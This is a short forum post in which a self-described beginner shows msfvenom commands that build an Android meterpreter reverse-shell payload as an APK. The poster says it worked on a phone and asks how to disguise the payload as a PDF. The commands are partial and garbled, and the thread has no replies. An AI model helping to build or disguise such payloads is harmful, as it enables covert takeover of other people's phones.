Forum Thread: Hey Guyz I Am New to Hacking and I Want to Know Something About Metasploit Payloads....

I started hacking with kali and i am curious about metasploit and tried to hack android with this payload "msfvenom -p android/meterpreter/reverse_tcp R> name.apk and when i deploy this malicious apk into phone it worked............but

when i tried msfvenom -p android/meterpreter/reverse_tcp o- name.pdf it get me reverse connection but no seesion was create ......

anyone can help me to make payload for android and disguide it as PDF????

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active